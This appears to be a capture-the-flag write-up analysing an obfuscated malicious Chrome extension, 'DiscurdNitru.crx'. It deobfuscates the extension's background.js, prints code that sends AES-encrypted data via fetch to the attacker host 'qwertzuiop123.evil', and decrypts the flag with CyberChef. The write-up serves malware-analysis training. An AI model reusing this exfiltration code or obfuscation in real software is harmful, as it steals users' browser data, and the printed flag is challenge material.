The challenge began with a Google Chrome extension, “DiscurdNitru.crx,” being given to contestants. When unpacking this extension, a .zip file was found, containing a JavaScript file titled “background.js.”

Opening this JavaScript file, it was immediately noticeable that the code was obfuscated. Two large arrays were present, containing what looked like random strings of characters and word/command fragments. Knowing this, the obfuscated code started to look a lot simpler to understand. The author of this code broke up sections of the code into different array items and concatenated these items in the code.

```
async function iF() {
q = [
'',
'ma',
'',
'',
'',
'',
'',
'',
'',
'h',
'124118',
'fetch',
'',
'et',
'',
'0A99',
'',
'',
'',
'',
'',
'ex',
'',
'',
'',
'',
'',
<snip>
```

```
<snip>
if (!(q[244] + q[82] + q[327] + q[1129] + q[1126] + q[192] + q[524] + q[1053] + q[934] + q[838] + q[830] + q[265] + q[454] + q[330] + q[520] + q[794] + q[610] + q[1054] + q[1003] + q[556] + q[1038] + q[809] + q[63] + q[1234] + q[1239] + q[220] + q[409] + q[1016] + q[929] + q[58] + q[1023] + q[545] in document)) {
document[q[244] + q[82] + q[327] + q[1129] + q[1126] + q[192] + q[524] + q[1053] + q[934] + q[838] + q[830] + q[265] + q[454] + q[330] + q[520] + q[794] + q[610] + q[1054] + q[1003] + q[556] + q[1038] + q[809] + q[63] + q[1234] + q[1239] + q[220] + q[409] + q[1016] + q[929] + q[58] + q[1023] + q[545]] = true;
<snip>
```

In order to deobfuscate this, sections of code can be taken and programmatically converted back into text using JavaScript. I found it easiest to do all of this from a browser console. I copied and pasted the code for the array, then decoded the body of the code by sections.

Once the entire background.js file has been deobfuscated, we get sections like this:

```
<snip>
if (new window[TextDecoder](utf-8)[decode](await window[crypto][subtle][digest](sha-256, y))[endsWith](chrome)) {
j = new window[Uint8Array](y[byteLength] + (await window[crypto][subtle][digest](sha-256, y))[byteLength]);
j[set](new window[Uint8Array](y), 0);
j[set](new window[Uint8Array](await window[crypto][subtle][digest](sha-256, y)), y[byteLength]);
window[fetch]("hxxps://qwertzuiop123.evil/" + [...new window[Uint8Array](await window[crypto][subtle][encrypt]({
[name]: AES-CBC,
[iv]: new window[TextEncoder](utf-8)[encode](_NOT_THE_SECRET_)
}, await window[crypto][subtle][importKey](raw, await window[crypto][subtle][decrypt]({
[name]: AES-CBC,
[iv]: new window[TextEncoder](utf-8)[encode](_NOT_THE_SECRET_)
}, await window[crypto][subtle][importKey](raw, new window[TextEncoder](utf-8)[encode](_NOT_THE_SECRET_), { [name]: AES-CBC }, true, [decrypt]), new window[Uint8Array]((E242E64261D21969F65BEDF954900A995209099FB6C3C682C0D9C4B275B1C212BC188E0882B6BE72C749211241187FA8)[match](/../g)[map](h => window[parseInt](h, 16)))), { [name]: AES-CBC }, true, [encrypt]), j))][map](x => x[toString](16)[padStart](2, '0'))[q338join](''));
<snip>
```

This code is much more readable. Below this snippit, it looks like this program is submitting something as a parameter to “hxxps://qwertzuiop123.evil/”. I can see from the code that it uses AES-CBC, so I will use CyberChef’s AES Decrypt operation.
CyberChef is an online and offline tool used to do many quick data processing/analysis operations. It can be found at https://gchq.github.io/CyberChef/.

There is a Uint8Array defined in the above code snippit, so I am assuming that will be our input. Looking further through the code, I also see “`_NOT_THE_SECRET_`” being encoded and processed twice, so let’s try that as both our key and initialization vector (IV).

When opening CyberChef, search for the "AES Decrypt" operation in the top left search bar. Drag and drop this operation into the "Recipe" in the middle. This will then display options for the AES key, initialization vector (IV), and mode being used. In the "Input" box, we will put the long string E242E64261D21969F65BEDF954900A995209099FB6C3C682C0D9C4B275B1C212BC188E0882B6BE72C749211241187FA8 found in the Uint8Array in the code snippit above.

Then, we add the potential key and IV we identified,"`_NOT_THE_SECRET_`", into their respective fields. The "Mode" box should have the value of CBC selected by default as this is the most common mode used in AES. This is the correct mode for this example, so just leave it as is.

**(Note: The key and IV fields in CyberChef are set to use hexadecimal by default. If you look to the right of each of these boxes, you will see that there is a dropdown menu. Select "UTF-8" for both the key and the IV since they will be in plaintext for this example. Please also ensure that the "Input" field beside the "Mode" field is set to Hex.)**

And we get `HTB{__mY_vRy_owN_CHR0me_M1N3R__}`! Looks like that is our flag for this challenge.